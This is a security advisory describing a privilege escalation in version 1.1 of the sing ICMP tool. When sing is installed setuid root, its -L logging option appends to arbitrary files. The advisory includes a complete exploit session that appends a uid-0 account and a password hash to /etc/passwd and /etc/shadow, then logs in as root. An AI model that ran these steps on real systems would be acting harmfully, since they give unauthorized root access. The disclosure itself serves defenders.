Sing Privilege Escalation
------------------------------------------------------------------------
SUMMARY
sing <http://sourceforge.net/projects/sing> is "a tool that sends ICMP
packets fully customized from command line". A vulnerability in the way
sing works allows local attackers who have access to a setuid root version
of sing to append arbitrary data to any file, which in turn allows them to
gain elevated privileges.
DETAILS
Vulnerable Systems:
* sing version 1.1
The sing program has a "-L" option that logs its output to a file.
Because sing does not check the ownership of that file, its log output can
be written to any file (more precisely, appended to it rather than
overwriting it). By using the -p option in conjunction with the -L option,
a local user can gain elevated privileges.
Exploit:
Here is an example session:
gat3way@gat3way:~$ cat hah
hack:x:0:0:/tmp:/bin/sh
n
gat3way@gat3way:~$ cat hah1
hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7:::
n
gat3way@gat3way:~$ grep hack /etc/passwd
gat3way@gat3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`"
SINGing to localhost (127.0.0.1): 78 data bytes
78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms
--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.073/0.073/0.073 ms
gat3way@gat3way:~$ sing -L /etc/passwd localhost -p "`cat hah`"
SINGing to localhost (127.0.0.1): 43 data bytes
43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms
--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.083/0.083/0.083 ms
gat3way@gat3way:~$ grep hack /etc/passwd
hack:x:0:0:/tmp:/bin/sh
gat3way@gat3way:~$ ssh hack@localhost
hack@localhost's password:
.
root@gat3way:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gat3way:~#
ADDITIONAL INFORMATION
The information has been provided by Milen Rangelov
<mailto:mrangelov@globul.bg>.